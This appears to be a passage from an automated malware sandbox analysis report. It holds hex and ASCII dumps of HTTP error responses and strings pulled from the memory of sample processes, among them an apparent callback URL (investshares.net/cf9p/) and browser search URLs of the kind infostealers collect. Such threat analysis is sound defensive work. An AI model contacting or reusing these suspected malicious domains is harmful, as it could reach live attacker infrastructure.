6b a0 79 2b 61 d2 11 7a cf f0 31 73 e0 7b 60 d7 45 88 36 7c db 20 09 87 b9 29 28 41 da 98 60 63 54 4f 83 3e 39 8b a9 cc e4 43 0a b7 4d 3b f6 3c de c1 71 09 80 66 98 a6 49 7e 86 ee d2 7a d9 7a cd 11 2a 1f 18 1e 13 c2 bf 0a 41 b8 6c 24 5c be fd 02 00 00 ff ff 0d 0a 62 0d 0a e3 02 00 b2 5e 55 84 16 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: e4LAK@+=}i`<nhq^gf&UKU)[X#zIeXVJY(A,v~UD7?sn1nvmdky+az1s{`E6| )(A`cTO>9CM;<qfI~zz*Al$\b^U0
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 02 Jan 2025 08:19:27 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LzqIqzX92jE6psuJdJaXjaWEPeLn0XkphZiy9Q7dtfZxPnJRr43f5D6RKNhQUju2LhCtwXGIUSJILLwoeNRM5tQBpVkw3xVhhgYvxhaoKFmSCNz66Tl%2B6S6qQryKSFs6m2RI"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8fb952ffaa128c15-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1749&min_rtt=1749&rtt_var=874&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=491&delivery_rate=0&cwnd=236&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 31 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 67 72 69 6d 62 6f 2e 62 6f 61 74 73 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 31 0d 0a 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 115<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.52 (Ubuntu) Server at www.grimbo.boats Port 80</address></body></html>10
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 148Content-Type: text/htmlDate: Thu, 02 Jan 2025 08:19:33 GMTEtag: "6743f11f-94"Server: nginxConnection: closeData Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 148Content-Type: text/htmlDate: Thu, 02 Jan 2025 08:19:36 GMTEtag: "6743f11f-94"Server: nginxConnection: closeData Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 148Content-Type: text/htmlDate: Thu, 02 Jan 2025 08:19:38 GMTEtag: "6743f11f-94"Server: nginxConnection: closeData Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 148Content-Type: text/htmlDate: Thu, 02 Jan 2025 08:19:41 GMTEtag: "6743f11f-94"Server: nginxConnection: closeData Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 02 Jan 2025 08:19:46 GMTServer: ApacheContent-Length: 774Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 34 30 34 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 22 3e 0d 0a 09 09 09 09 3c 68 31 3e 34 3c 73 70 61 6e 3e 30 3c 2f 73 70 61 6e 3e 34 3c 2f 68 31 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 68 32 3e 74 68 65 20 70 61 67 65 20 79 6f 75 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 09 09 09 3c 66 6f 72 6d 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 73 65 61 72 63 68 22 3e 0d 0a 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 53 65 61 72 63 68 2e 2e 2e 22 3e 0d 0a 09 09 09 09 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 3e 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 09 09 09 3c 2f 66 6f 72 6d 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</s
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 02 Jan 2025 08:19:49 GMTServer: ApacheContent-Length: 774Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 34 30 34 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 22 3e 0d 0a 09 09 09 09 3c 68 31 3e 34 3c 73 70 61 6e 3e 30 3c 2f 73 70 61 6e 3e 34 3c 2f 68 31 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 68 32 3e 74 68 65 20 70 61 67 65 20 79 6f 75 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 09 09 09 3c 66 6f 72 6d 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 73 65 61 72 63 68 22 3e 0d 0a 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 53 65 61 72 63 68 2e 2e 2e 22 3e 0d 0a 09 09 09 09 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 3e 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 09 09 09 3c 2f 66 6f 72 6d 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</s
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 02 Jan 2025 08:19:52 GMTServer: ApacheContent-Length: 774Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 34 30 34 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 22 3e 0d 0a 09 09 09 09 3c 68 31 3e 34 3c 73 70 61 6e 3e 30 3c 2f 73 70 61 6e 3e 34 3c 2f 68 31 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 68 32 3e 74 68 65 20 70 61 67 65 20 79 6f 75 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 09 09 09 3c 66 6f 72 6d 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 73 65 61 72 63 68 22 3e 0d 0a 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 53 65 61 72 63 68 2e 2e 2e 22 3e 0d 0a 09 09 09 09 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 3e 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 09 09 09 3c 2f 66 6f 72 6d 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</s
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 02 Jan 2025 08:19:54 GMTServer: ApacheContent-Length: 774Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 34 30 34 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 22 3e 0d 0a 09 09 09 09 3c 68 31 3e 34 3c 73 70 61 6e 3e 30 3c 2f 73 70 61 6e 3e 34 3c 2f 68 31 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 68 32 3e 74 68 65 20 70 61 67 65 20 79 6f 75 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 09 09 09 3c 66 6f 72 6d 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 73 65 61 72 63 68 22 3e 0d 0a 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 53 65 61 72 63 68 2e 2e 2e 22 3e 0d 0a 09 09 09 09 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 3e 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 09 09 09 3c 2f 66 6f 72 6d 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404">
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Wed, 01 Jan 2025 16:19:24 GMTContent-Type: text/htmlContent-Length: 166Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Wed, 01 Jan 2025 16:19:27 GMTContent-Type: text/htmlContent-Length: 166Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Wed, 01 Jan 2025 16:19:29 GMTContent-Type: text/htmlContent-Length: 166Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
              Source: YVdkpeLSDe.exe, 00000007.00000002.3360691498.00000000024E6000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.investshares.net
              Source: YVdkpeLSDe.exe, 00000007.00000002.3360691498.00000000024E6000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.investshares.net/cf9p/
              Source: fc.exe, 00000005.00000002.3363196622.00000000077EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: fc.exe, 00000005.00000002.3363196622.00000000077EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: fc.exe, 00000005.00000002.3363196622.00000000077EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: fc.exe, 00000005.00000002.3363196622.00000000077EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: fc.exe, 00000005.00000002.3363196622.00000000077EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: fc.exe, 00000005.00000002.3363196622.00000000077EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: fc.exe, 00000005.00000002.3363196622.00000000077EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
